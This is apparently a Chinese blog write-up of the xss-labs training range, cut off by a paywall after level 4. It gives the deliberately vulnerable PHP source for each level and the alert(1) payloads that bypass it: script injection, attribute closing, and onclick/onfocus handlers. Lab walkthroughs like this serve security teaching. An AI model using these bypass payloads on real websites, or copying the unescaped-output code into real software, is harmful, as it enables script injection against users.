XSS-labs详解

已于 2024-03-25 17:08:32 修改
阅读量3.7k 收藏 36
点赞数 33
CC 4.0 BY-SA版权
文章标签: xss php 前端 xsslabs
于 2024-03-23 16:00:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ytdd66/article/details/136946635
本文围绕XSS靶场展开,介绍了xss - labs的下载地址。详细阐述了多关XSS挑战的绕过方法,如onclick、onfocus事件绕过、a href标签绕过、大小写绕过、双写绕过等,还涉及Referer注入、User Agent注入、cookie注入等,给出了各关对应的payload构造。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

xss-labs下载地址https://github.com/do0dl3/xss-labs

目录

进入靶场点击图片,开始我们的XSS之旅!​

Less-1

Less-2(闭合)

Less-3(onclick onfocus事件绕过)

Less-4(onclick onfocus事件绕过闭合)

Less-5(a href 标签绕过)

Less-6(大小写绕过)

Less-7(双写绕过)

Less-8(unicode编码绕过)

Less-9(注释http://绕过)

Less-10(隐藏的传参)

Less-11(Referer注入)

Less-12(User Agent注入)

Less-13(cookie注入)

Less-14(这一关有问题直接十五关)

Less15(ng-include文件包涵)

Less-16(url编码)

Less-17(embed标签)

Less-18(embed标签)

Less-19-20(flash技术已经全面停用了就不做了)

进入靶场点击图片,开始我们的XSS之旅!

Less-1

查看源码

代码从 URL 的 GET 参数中取得 "name" 的值,然后输出一个居中的标题,内容是 "欢迎用户" 后面跟上这个值,显示从 GET 参数中获取的 "name" 值的字符数。

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

我们修改一下输入尝试一下,没什么难点

直接上payload

<script>alert(1)</script>

点击确认进入下一关

Less-2(闭合)

我们使用第一关的测试方法尝试一下,打咩


直接看源码,看到,尝试一下闭合

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>

看一下这个函数htmlspecialchars

"'><script>alert(1)<%2Fscript><"'

Less-3(onclick onfocus事件绕过)

输入数据,尝试一下输出位置,发现三个位置有输出

直接上源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

这里使用 htmlspecialchars 函数对 $str 进行转义

表单包含一个文本输入框,其 name 属性为 "keyword",value 属性设置为 $str。这里也使用了 htmlspecialchars 函数对 $str 进行转义

我们使用一个onclick事件属性进行一个绕过构造payload

' οnclick='alert(1)

也可以使用onfocus事件进行绕过,构造payload

' οnfοcus='alert(1)

Less-4(onclick onfocus事件绕过闭合)

进入第四关我们依旧尝试之前的语句

' οnclick='alert(1),发现不行

查看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

改变一下闭合,构造payload

"οnclick="alert(1)

"οnfοcus="alert(1)也行

最低0.47元/天 解锁文章

200万优质内容无限畅学
羊腿大大
关注
XSS-labs
Mccc_li的博客
04-09 1197
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
xss-labs通关大合集
热门推荐
wo41ge的博客
07-26 3万+
xss-labs 文章所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs 然后开始通关 level1 仔细观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面 回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度 接下来,查看源码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么 就很明显,这一关主要就是考察反射型xss 但是由于不
xss-labs详解
weixin_52385170的博客
09-30 448
xss-labs详解
XSS Lab 前 5 关通关攻略:从入门到实战
最新发布
qq_74175927的博客
05-24 784
本文分享了XSSLab前5关的通关技巧,从基础注入到绕过过滤机制。Level1通过<script>标签直接注入;Level2构造闭合标签打破双引号包裹;Level3利用单引号和事件触发;Level4在尖括号被过滤时使用属性闭合;Level5通过超链接替代<script>标签。文章总结了XSS攻击的核心思路:寻找输入点、构造有效Payload、灵活运用替代方法,并提供了防御建议,包括输入过滤、输出转义和使用HTTP-only Cookie。通过这些实战练习,读者可以直观理解XSS攻击原理及防护措施。
xsslabs.zip
07-23
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具
xss-labs
2302_80044238的博客
03-23 1250
jsp的全称是java servlet page 它就是java的服务器页面因为它相对于servlet传回数据的方法比较简单Servlet的本质是一个,旨在处理HTTP请求并生成HTTP响应。
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
xss-labs-master源码
07-06
XSS Labs Master源码详解:深度探索跨站脚本攻击与防御》 XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上执行恶意脚本,进而盗取用户数据或控制用户的行为。"xss-labs-...
xss-labs-master.rar
05-09
XSS实验室详解:从入门到精通》 XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,允许攻击者在用户浏览器中注入恶意脚本。"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
**XSS注入详解** XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息、操控用户行为或进行钓鱼攻击。`xss-labs-master....
xss-lab
zl0_00_0的博客
02-25 782
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面中执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览该页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
xss-labs.zip
06-25
xss-labs,该环境是用于练习xss跨站脚本攻击的一个集成环境,属于闯关类型。将该环境里的xss类型全部通过,有助于理解xss的攻击原理。
XSS-Lab(XSS注入教程)
DMXA的博客
11-01 1040
解题思路:先观察题目的类型,猜哪个地方可以存在注入,代码分析这个可以交给chatgpt,下面就可以尝试自己构造好的payload 做了10题下来,发现难度是依次上升的解题思路:先观察题目的类型,猜哪个地方可以存在注入,然后是代码分析,这个可以交给chatgpt,下面就可以尝试自己构造好的payload,也可以进行BP抓包看下具体数据,或者指纹识别查一下框架是否有历史漏洞, XSS常用的标签:
xss-labs通关全详解
Keeping it fresh at all times.
10-09 3646
为探讨清楚XSS的诸多细节,我们特选经典的xss-labs进行从入门到进阶的专项训练。在做题过程中,作者把用到的知识进行了全面、详细、系统的总结,形成了本文
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 7107
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS-LABS 浅谈
tricker2的博客
07-26 348
(⊙﹏⊙)因为自己的原因,第一次写的稿子被自己给搞没了,重新打字就变得有点心情不爽,这次的靶场建立之后我发现了在做关卡的时候却出现了一个其他的问题,我搭建的靶场在输入请求之后会自动把我的单引号转为斜杠加单引号,经过一些验证才知道,这是因为php.ini文件配置中的一点小问题,把他全改成OFF就可以了下面上图 顺便也说下靶场搭建吧,简单的github上下载之后,直接解压到你的集成环境里,我用的是phpstudy,就不过多说了,xss注入分为三个类型反射型,dom型还有存储型三种,主要形成的原因就是前端代码对一
xss-labs通关大详解
shayebudon的博客
10-31 1287
目录 level1 level2 level3 level4 level5 level6 level7 level8 level9 xss-labs level1 观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面 回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度 接下来,查看源码 他将name的参数值放到了<h2></h2>之间 将name的参数重新赋值:&lt...
xss-labs详解(上)1-10
hxhxhxhxx的博客
08-02 1285
xss-labs详解Level 1Level 2htmlspecialcharsLevel 3Level 4Level 5Level 6Level 7Level 8Level 9LevelLevelLevelLevel Level 1 源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-
xss-labs通关详解
09-18
xss-labs是一个测试平台,用于演示和测试跨站脚本攻击(XSS)漏洞。在这个平***构造特定的代码,我们可以在平台上触发XSS漏洞,从而实现攻击目的。 在第6关中,我们可以看到源码中对一些字符进行了替换,但并没有限制大小写。因此,我们可以利用大小写绕过的方式来绕过替换,注入恶意脚本。在这个例子中,我们可以将"h2"闭合为"H2",然后在其后插入恶意脚本,如<script>alert('xss')</script>。另外,还可以使用类似的方式在<a>标签中插入恶意脚本。 通过构造恶意代码并在URL参数中传入,我们可以成功触发XSS漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值